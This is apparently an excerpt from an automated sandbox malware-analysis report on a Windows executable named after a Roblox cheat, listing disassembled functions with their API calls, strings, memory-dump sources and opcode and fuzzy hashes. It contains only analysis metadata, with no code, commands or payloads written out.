                                                                                                                  Function 00007FF6E7E220D0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF6E7E2207E), ref: 00007FF6E7E220F6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ChangeCloseFindNotification
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2591292051-0
                                                                                                                  • Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                                                  • Instruction ID: 90efa27b442f1131d009ae8d6b195f17745c7dcf33f13ff206cd17fb4482b8c5
                                                                                                                  • Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                                                  • Instruction Fuzzy Hash: DAF0AF23B0868385FB248B20F8417792665EB14B78F4A4334DBBC861D4DF6DDD95830A
                                                                                                                  Function 00007FF6E7E4D94C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                                                  • Instruction ID: fbd0e2d45dc227de0556100796f4ab066b6ae15c39583a88990574022d802de2
                                                                                                                  • Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                                                  • Instruction Fuzzy Hash: DDF03452A0924744FF14A7B5E8113B412905F887A0F081630DBFEC63C2EEAEA482A21A
                                                                                                                  Function 00007FF6E7E2273C Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 749574446-0
                                                                                                                  • Opcode ID: 182d9e1e92039184aab4081fafd09b1cf385b4bd914a3c272b872952a66d9790
                                                                                                                  • Instruction ID: afad36b56a49a56e2676e13545769eb80ac0713d25e0f53143b8848a34cba887
                                                                                                                  • Opcode Fuzzy Hash: 182d9e1e92039184aab4081fafd09b1cf385b4bd914a3c272b872952a66d9790
                                                                                                                  • Instruction Fuzzy Hash: 6FE0C213B2455A82FF20AB3AF8427391321EF8CF84B481030CE9C87361CE2EC8818B49
                                                                                                                  Function 00007FF6E7E22490 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileType
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3081899298-0
                                                                                                                  • Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                                                  • Instruction ID: d469caedbbfa7794a836552dc3c10b4440c7f37665b95fba8373dcf56aaad06d
                                                                                                                  • Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                                                  • Instruction Fuzzy Hash: D8D01213D0949282ED109735F85213C2354AF92739FB40730D6BEC26E1CE1FA896A35A
                                                                                                                  Function 00007FF6E7E27FC4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectory
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1611563598-0
                                                                                                                  • Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                                                  • Instruction ID: da5c9e8b5624051a597ca7f10587b6613ced8e32bfa68135a0203e0d8d3b6bd6
                                                                                                                  • Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                                                  • Instruction Fuzzy Hash: 5AC08C22F09503C1EA085B26DCCA21A13A4BB40B08B604034C25CC2120CE2EC8FA938A

                                                                                                                  Non-executed Functions

                                                                                                                  Function 00007FF6E7E1C2F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 754fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
                                                                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                  • API String ID: 2659423929-3508440684
                                                                                                                  • Opcode ID: f1e6eec8ecbe5e09d381db8a89365ebfa2c377f5d47fbbeb23eb751c6f3faf25
                                                                                                                  • Instruction ID: d3876a43a6166f0b1b658d3d52c409c478cbee95d2472553ebd5166251ae1734
                                                                                                                  • Opcode Fuzzy Hash: f1e6eec8ecbe5e09d381db8a89365ebfa2c377f5d47fbbeb23eb751c6f3faf25
                                                                                                                  • Instruction Fuzzy Hash: CA62EF63F0869285FB00DB74D8463BD2361AB857A4F504231DABDD7AE6DE3DE489C309
                                                                                                                  Function 00007FF6E7E2F180 Relevance: 43.2, APIs: 22, Strings: 2, Instructions: 1205COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                                                                                                  • String ID: %ls$%s: %s
                                                                                                                  • API String ID: 2539828978-2259941744
                                                                                                                  • Opcode ID: 424a1e263fd4ea943b566bb6394ea34e411eb33a20c874d1edcb03b8c882655e
                                                                                                                  • Instruction ID: d4159074a4848eb09e183d4991ae0ac6c58a6521a85081b6a26a56962a6fc404
                                                                                                                  • Opcode Fuzzy Hash: 424a1e263fd4ea943b566bb6394ea34e411eb33a20c874d1edcb03b8c882655e
                                                                                                                  • Instruction Fuzzy Hash: 8FB2D863A1868381EA109B29E4553BE6361EFC6790F104336EBFD877E6EE2DD540C349
                                                                                                                  Function 00007FF6E7E52550 Relevance: 22.3, APIs: 8, Strings: 4, Instructions: 1310COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfomemcpy_s
                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                  • API String ID: 1759834784-2761157908
                                                                                                                  • Opcode ID: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                                                                                                                  • Instruction ID: 55096b6b9d5d206710bdd19fbfe462f70d0ea29188c4ea0ccc8273c22c6235fe
                                                                                                                  • Opcode Fuzzy Hash: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                                                                                                                  • Instruction Fuzzy Hash: 04B2E4B3A082868BE7258F69E4407FD27A5FB4438CF105135DA6A97B84DF3EE9048B45
                                                                                                                  Function 00007FF6E7E21A48 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 375fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                                                                                  • String ID: rtmp
                                                                                                                  • API String ID: 3587137053-870060881
                                                                                                                  • Opcode ID: 6844fc52beb637c2b27de38a8f1773b81546f1263b6adb3febe2d016913ca72a
                                                                                                                  • Instruction ID: 96f6c9b829eb6ecf54b8d047b4cca0d6f1e2ccfcd5845daffc8c8acac65559e9
                                                                                                                  • Opcode Fuzzy Hash: 6844fc52beb637c2b27de38a8f1773b81546f1263b6adb3febe2d016913ca72a
                                                                                                                  • Instruction Fuzzy Hash: F5F1C223B08A8291EB10CB65E8802BD6761FF857C4F501132EBADC7AA9DF3DD585C749
                                                                                                                  Function 00007FF6E7E25B60 Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1693479884-0
                                                                                                                  • Opcode ID: b93ad2ce8aad967ae532d61f25a7d43417873e191935b00f4afba2dee12255a3
                                                                                                                  • Instruction ID: 54715a58cdd9b0e9498baa479b3ed08b9a5e79c8e1b572fc80449519ede1b027
                                                                                                                  • Opcode Fuzzy Hash: b93ad2ce8aad967ae532d61f25a7d43417873e191935b00f4afba2dee12255a3
                                                                                                                  • Instruction Fuzzy Hash: 3DA1D263F14B9284FE00CB79D9452BC2321AF84BE4B144235DEBD97BD9EE3DE4429249
                                                                                                                  Function 00007FF6E7E43170 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3140674995-0
                                                                                                                  • Opcode ID: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                                                                                  • Instruction ID: 286c3cd48dec1abe4ac04d5372c14bfe5edea00d02027fb70d7d7f428b1df47d
                                                                                                                  • Opcode Fuzzy Hash: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                                                                                  • Instruction Fuzzy Hash: 89315A73608B818AEB609F60E8503EA3360FB84744F44403ADA9D97B89EF3DD649C718
                                                                                                                  Function 00007FF6E7E476D8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1239891234-0
                                                                                                                  • Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                                                                                  • Instruction ID: 47c9faedbe034defcb9ce124b83d91418501f534faf36ca91d8b18538dbd7146
                                                                                                                  • Opcode Fuzzy Hash: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                                                                                  • Instruction Fuzzy Hash: E4316D37608B8186EB608F25E8403AE73A4FB88754F540135EAAD83B99EF3DD546CB45
                                                                                                                  Function 00007FF6E7E11AA4 Relevance: 6.3, APIs: 4, Instructions: 285COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3668304517-0
                                                                                                                  • Opcode ID: 62daf4ca79de1f061943721c82fe4b1d8a79ca39ff2b6a03206309b778900290
                                                                                                                  • Instruction ID: 3b01167be46f12c8707ddba9d6881d6640a676ede9bb4aa52d2bdfb367fe5e6f
                                                                                                                  • Opcode Fuzzy Hash: 62daf4ca79de1f061943721c82fe4b1d8a79ca39ff2b6a03206309b778900290
                                                                                                                  • Instruction Fuzzy Hash: 5FB1D363B14A8686EB10DB65D8413ED2361FF89784F405231EAAD87BD9EF3DD948C309
                                                                                                                  Function 00007FF6E7E4FA94 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E7E4FAC4
                                                                                                                    • Part of subcall function 00007FF6E7E47934: GetCurrentProcess.KERNEL32(00007FF6E7E50CCD), ref: 00007FF6E7E47961
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                  • String ID: *?$.
                                                                                                                  • API String ID: 2518042432-3972193922
                                                                                                                  • Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                                                                  • Instruction ID: 015e5859bfe37553f47d5fb0763bdc54e99dd0d48130c392b8a5419b0c49d5fd
                                                                                                                  • Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                                                                  • Instruction Fuzzy Hash: 4751F163F15A9981EB14DFA2D8102B863A0FB48FD8B484531DEAD87B84EF3DD0439309
                                                                                                                  Function 00007FF6E7E52080 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy_s
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1502251526-0
                                                                                                                  • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                                                  • Instruction ID: 82d2f344011ac8b3b402e61314d57b97a9d501f572029eba86f12bb88b361322
